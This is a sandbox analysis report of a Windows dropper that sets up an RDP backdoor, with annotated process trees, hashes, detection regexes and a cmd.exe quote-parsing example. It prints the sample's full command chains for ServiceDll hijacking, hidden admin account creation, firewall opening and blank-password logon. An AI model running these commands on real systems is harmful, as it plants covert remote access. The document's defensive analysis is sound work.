Analysis
max time kernel: 117s
max time network: 125s
platform: windows7_x64
resource: win7-en-20211208
submitted: 13-02-2022 15:28
Static task: static1
Behavioral task: behavioral1
  Sample: 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
  Resource: win10v2004-en-20220113
General
Target: 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
Size: 448KB
MD5: 808189ade846e9d5855baed60727ee6e
SHA1: 45a356565238d83b726852a4a69fa764a00c62f0
SHA256: 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855
SHA512: 93542e23f5ffdb7bedc98b63595871d4da488d90e19e0e214de204ed11390bb61fddef239ebb51720372317da208a7aeab3d7783f5b426817a0b12993a6df010
Malware Config
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Executes dropped EXE (1 IoC)
  Processes:
    pid 1544  iv3yydjq.exe
- Modifies Windows Firewall (1 TTP)
- Possible privilege escalation attempt (6 IoCs)
  Processes:
    pid 744   icacls.exe
    pid 1684  icacls.exe
    pid 1720  takeown.exe
    pid 1008  icacls.exe
    pid 1516  icacls.exe
    pid 1588  takeown.exe
- Sets DLL path for service in the registry (2 TTPs)
- Allows Network login with blank passwords (1 TTP, 1 IoC)
  Allows local user accounts with blank passwords to access device from the network.
  Processes:
    reg.exe  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"
- Modifies file permissions (1 TTP, 6 IoCs)
  Processes:
    pid 1720  takeown.exe
    pid 1008  icacls.exe
    pid 1516  icacls.exe
    pid 1588  takeown.exe
    pid 744   icacls.exe
    pid 1684  icacls.exe
- Drops file in Program Files directory (2 IoCs)
  Processes:
    iv3yydjq.exe  File opened for modification  C:\Program Files\Common Files\Services\rdpwrap.ini
    iv3yydjq.exe  File opened for modification  C:\Program Files\Common Files\Services\rdpwrap.dll
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic signature text; nothing else in this report shows encryption activity, the observed payload is RDP enablement.)
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Kills process with taskkill (1 IoC)
  Processes:
    pid 428  taskkill.exe
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
    pid 1544  iv3yydjq.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
    pid 744  11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe  (64 events)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    pid 744  11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe  Token: SeDebugPrivilege
    pid 428  taskkill.exe  Token: SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
    pid 744   11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe  (3 events)
    pid 1544  iv3yydjq.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid -> target pid, source image -> target image, event count; the report lists the first 64 events, so the last group is cut short):
    744 -> 1288   11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe -> cmstp.exe  (3)
    1480 -> 1544  cmd.exe -> iv3yydjq.exe  (4)
    1544 -> 1764  iv3yydjq.exe -> cmd.exe  (4)
    1544 -> 1336  iv3yydjq.exe -> cmd.exe  (4)
    1544 -> 968   iv3yydjq.exe -> cmd.exe  (4)
    1544 -> 1696  iv3yydjq.exe -> cmd.exe  (4)
    968 -> 1724   cmd.exe -> choice.exe  (4)
    1336 -> 288   cmd.exe -> schtasks.exe  (4)
    1696 -> 848   cmd.exe -> choice.exe  (4)
    1336 -> 2044  cmd.exe -> choice.exe  (4)
    1696 -> 1720  cmd.exe -> takeown.exe  (4)
    968 -> 1060   cmd.exe -> net.exe  (4)
    1336 -> 912   cmd.exe -> schtasks.exe  (4)
    1336 -> 552   cmd.exe -> choice.exe  (4)
    1696 -> 1008  cmd.exe -> icacls.exe  (4)
    1060 -> 1736  net.exe -> net1.exe  (4)
    1696 -> 1516  cmd.exe -> icacls.exe  (1)
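The signatures above are individually noisy (takeown/icacls, net user, reg add all occur in legitimate administration); what makes this sample an RDP backdoor is the combination. The following is an added example, not part of the sandbox report and not the sample's code: the command lines from this report's process tree, re-typed as constructed process-creation records, are run through a small rule set and the hits are correlated into a host-level verdict. The (image, cmdline) record shape and the rule names are assumptions, not any EDR or Sysmon schema; in production the same regexes would be applied to the command-line field of your process telemetry.

```python
"""Detection logic for the RDP-backdoor command chain recorded in this report.

Added example, not part of the sandbox report and not the sample's code.
EVENTS are constructed from the command lines in the report's process tree;
the (image, cmdline) pair is an assumed minimal process-creation record.
"""
import re

# One regex per behaviour, matched against the full command line.
# Registry paths contain literal backslashes, hence the doubled ones.
RULES = {
    # TermService ServiceDll pointed at anything other than the stock termsrv.dll
    "termservice_servicedll_hijack": re.compile(
        r"reg(?:\.exe)?\s+add\s+\"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters\"?"
        r".*?/v\s+ServiceDll\b(?!.*termsrv\.dll)", re.I),
    "blank_password_network_logon": re.compile(r"LimitBlankPasswordUse\b.*?/d\s+0\b", re.I),
    "rdp_enabled": re.compile(r"fDenyTSConnections\b.*?/d\s+0\b", re.I),
    "rdp_firewall_opened": re.compile(
        r"netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group=\"Remote Desktop\".*enable=yes", re.I),
    "local_account_created": re.compile(r"net1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "added_to_administrators": re.compile(
        r"net1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "added_to_rdp_users": re.compile(
        r"net1?(?:\.exe)?\s+localgroup\s+\"remote desktop users\"\s+\S+\s+/add\b", re.I),
    # Winlogon\SpecialAccounts\UserList <name> = 0 hides the account from the logon screen
    "account_hidden_from_logon": re.compile(
        r"Winlogon\\SpecialAccounts\\UserList\"?\s+/v\s+\S+\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I),
    # takeown/icacls against a path under Program Files: ACL rewrite in a protected tree
    "program_files_acl_tamper": re.compile(
        r"\b(?:takeown|icacls)(?:\.exe)?\b[^\"]*\"C:\\Program Files\\", re.I),
    "scheduled_task_highest": re.compile(r"schtasks\s+/create\b.*?/rl\s+highest\b", re.I),
    "rdpwrap_artifact": re.compile(r"rdpwrap\.(?:dll|ini)\b", re.I),
}

# Constructed from the report's process tree: (image, command line).
EVENTS = [
    ("schtasks.exe", r'schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f'),
    ("takeown.exe", r'TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"'),
    ("icacls.exe", r'ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F'),
    ("reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f'),
    ("reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f'),
    ("netsh.exe", r'netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes'),
    ("net.exe", r'net user SysWOW64 t0or642531 /add /expires:never'),
    ("net.exe", r'net localgroup Administrators SysWOW64 /add'),
    ("net.exe", r'net localgroup "Remote desktop users" SysWOW64 /add'),
    ("reg.exe", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f'),
    ("choice.exe", r'choice /n /c y /d y /t 3'),       # benign noise from the same chain
    ("net.exe", r'net start "TermService"'),
]


def classify(cmdline):
    """Names of all rules that fire on one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}


def assess(events):
    """Correlate per-process hits into a host-level verdict.

    An RDP backdoor needs three things together: the RDP service replaced
    (or RDP Wrapper files staged), an account to log in with, and RDP
    reachable (policy enabled or firewall opened). Any one alone is noisy.
    """
    hits = {}
    for image, cmdline in events:
        for tag in classify(cmdline):
            hits.setdefault(tag, []).append(f"{image}: {cmdline[:70]}")
    tags = set(hits)
    service = bool(tags & {"termservice_servicedll_hijack", "rdpwrap_artifact"})
    account = bool(tags & {"local_account_created", "added_to_rdp_users",
                           "blank_password_network_logon"})
    reach = bool(tags & {"rdp_enabled", "rdp_firewall_opened"})
    return {"tags": sorted(tags), "hits": hits, "rdp_backdoor": service and account and reach}


if __name__ == "__main__":
    verdict = assess(EVENTS)
    for tag in verdict["tags"]:
        print(f"{tag}: {len(verdict['hits'][tag])} process(es)")
    print("rdp_backdoor:", verdict["rdp_backdoor"])
```

The negative lookahead in the ServiceDll rule is what keeps it quiet on a legitimate repair that sets the value back to `%SystemRoot%\System32\termsrv.dll`; the correlation in `assess` is deliberately strict, a single `net user /add` or a lone firewall change should not page anyone.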
Processes
(tree depth in brackets; image path on the first line, command line on the second)

[1] C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
    "C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [2] \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au c:\Users\Public\\qpcxh2bd.inf
      Note: cmstp.exe /au installs a connection-manager profile from the named INF. The cmd.exe root that follows has no recorded parent in this tree, so the INF is the likely launcher, but the report does not show its contents (its hashes are listed under Downloads).

[1] C:\Windows\system32\cmd.exe
    cmd /c start c:\Users\Public\iv3yydjq.exe
    - Suspicious use of WriteProcessMemory

  [2] \??\c:\Users\Public\iv3yydjq.exe
      c:\Users\Public\iv3yydjq.exe
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c mkdir "C:\Program Files\Common Files\Services" & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst" /f & exit
        - Suspicious use of WriteProcessMemory
        Note: the task exists only long enough to be run (create with /rl highest, /Run, /Delete, a few seconds apart); its execution under taskeng.exe appears further down as a separate root, and no task is left behind for a later audit to find.

      [4] C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f
          - Creates scheduled task(s)

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\schtasks.exe
          schtasks /Run /tn "lst"

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\schtasks.exe
          schtasks /Delete /tn "lst" /f

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c choice /n /c y /d y /t 3 > nul & net user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit
        - Suspicious use of WriteProcessMemory
        Note: the quote after "Admin" is unbalanced (a blank password needs two), so cmd.exe treats every following & as quoted text and hands the entire tail to net.exe as its argument; the tree shows no reg.exe children under this cmd.exe, only choice.exe and net.exe. None of the CredSSP (AllowEncryptionOracle=2), Remote Assistance, Terminal Services logging or FIDO/PIN policy changes in this line were applied in this run. The RDP enablement that did succeed is in the next cmd.exe.

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\net.exe
          net user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\iv3yydjq.exe" & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & net stop "TermService" /y & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes & net user SysWOW64 t0or642531 /add /expires:never & choice /n /c y /d y /t 3 > nul & net localgroup Administrators SysWOW64 /add & net localgroup "Remote desktop users" SysWOW64 /add & choice /n /c y /d y /t 3 > nul & net localgroup "Remote desktop users" "Admin" /add & net start "TermService" & exit
        - Suspicious use of WriteProcessMemory
        Note: this is the chain that actually opens the box. del is a cmd.exe builtin, so the dropper's self-delete leaves no child process here (the file's hashes survive under Downloads). The file names rdpwrap.dll and rdpwrap.ini match the open-source RDP Wrapper Library's layout, though the report does not identify the build. Stopping TermService, repointing its ServiceDll away from the stock %SystemRoot%\System32\termsrv.dll and restarting it loads the dropped DLL as the Remote Desktop service; fDenyTSConnections=0 plus the firewall rule group make it reachable; the SysWOW64 account (password in clear in the command line, never expiring) is placed in Administrators and Remote Desktop Users, and LimitBlankPasswordUse=0 additionally allows network logon to local accounts that have no password.

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\takeown.exe
          TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\icacls.exe
          ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "Admin":F
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\icacls.exe
          ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\takeown.exe
          TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\icacls.exe
          ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "Admin":F
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\icacls.exe
          ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\net.exe
          net stop "TermService" /y

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "TermService" /y

      [4] C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

      [4] C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

      [4] C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
          - Allows Network login with blank passwords

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

      [4] C:\Windows\SysWOW64\net.exe
          net user SysWOW64 t0or642531 /add /expires:never

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user SysWOW64 t0or642531 /add /expires:never

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\net.exe
          net localgroup Administrators SysWOW64 /add

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup Administrators SysWOW64 /add

      [4] C:\Windows\SysWOW64\net.exe
          net localgroup "Remote desktop users" SysWOW64 /add

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup "Remote desktop users" SysWOW64 /add

      [4] C:\Windows\SysWOW64\choice.exe
          choice /n /c y /d y /t 3

      [4] C:\Windows\SysWOW64\net.exe
          net localgroup "Remote desktop users" "Admin" /add

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup "Remote desktop users" "Admin" /add

      [4] C:\Windows\SysWOW64\net.exe
          net start "TermService"

        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 start "TermService"

[1] C:\Windows\system32\taskkill.exe
    taskkill /IM cmstp.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskeng.exe
    taskeng.exe {04D56997-B61C-41CA-AD2A-11402AF92322} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]

  [2] C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"

    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat

      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f
          Note: this is the payload of the short-lived "lst" task above, running via taskeng.exe. A zero DWORD under SpecialAccounts\UserList hides the SysWOW64 account from the Windows logon screen and the User Accounts control panel; the account keeps its Administrators and Remote Desktop Users membership and still appears to net user, Get-LocalUser and SAM enumeration.
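The process tree above shows two near-identical batches of reg add commands with very different outcomes: the first reached net.exe as one giant argument, the second ran as individual reg.exe processes. The cause is cmd.exe's quote handling, reproduced here as an added example (not part of the sandbox report and not the sample's code): a double quote toggles in-string mode and & is a command separator only outside it, so a single unbalanced quote after "Admin" swallows the rest of the line. BROKEN below is a shortened copy of the report's line with two of the reg adds kept, constructed for this example; FIXED assumes the author meant a blank password ("") and is labelled as that assumption.

```python
"""cmd.exe quote handling, as it affected this sample's first reg-add batch.

Added example, not part of the sandbox report and not the sample's code.
cmd.exe treats '&' as a command separator only outside double quotes; a
quote toggles in-string mode and end of line does not close it. The
report's line  net user "Admin" " & reg add ...  has one unbalanced quote,
so every later '&' sits inside a quoted run and the whole tail reaches
net.exe as arguments, which is what the process tree records.
"""


def cmd_split_commands(line):
    """Split a cmd.exe line on unquoted '&', '&&', '|' and '||'.

    A double quote toggles in-string mode; '^' outside quotes escapes the
    next character. Redirections are left inside the command text.
    """
    commands, current, in_quotes, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == "^" and not in_quotes and i + 1 < len(line):
            current.append(line[i + 1])  # escaped character is literal
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in "&|" and not in_quotes:
            commands.append("".join(current).strip())
            current = []
            if i + 1 < len(line) and line[i + 1] == ch:  # '&&' or '||'
                i += 1
            i += 1
            continue
        current.append(ch)
        i += 1
    commands.append("".join(current).strip())
    return [c for c in commands if c]


# Shortened copy of the report's line (constructed; two of the reg adds kept).
BROKEN = (
    r'choice /n /c y /d y /t 3 > nul & net user "Admin" " & '
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & '
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & exit'
)
# Assumption: the author meant a blank password, i.e. "" rather than a lone quote.
FIXED = BROKEN.replace('net user "Admin" " &', 'net user "Admin" "" &')


def reg_adds_that_run(line):
    """Return the 'reg add' commands cmd.exe would actually dispatch."""
    return [c for c in cmd_split_commands(line) if c.lower().startswith("reg add")]


if __name__ == "__main__":
    for label, line in (("broken", BROKEN), ("fixed", FIXED)):
        cmds = cmd_split_commands(line)
        print(f"{label}: {len(cmds)} command(s), {len(reg_adds_that_run(line))} reg add(s) dispatched")
        print("  second command starts with:", cmds[1][:48])
```

For incident scoping this matters: a host hit by this sample will show the ServiceDll, fDenyTSConnections, LimitBlankPasswordUse, firewall and account changes from the second batch, but not the CredSSP, Remote Assistance or logging-policy changes from the first, and an analyst who reads the first batch's command line as executed will overstate the hardening that needs to be reverted.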
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Common Files\Services\rdpwrap.dll
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
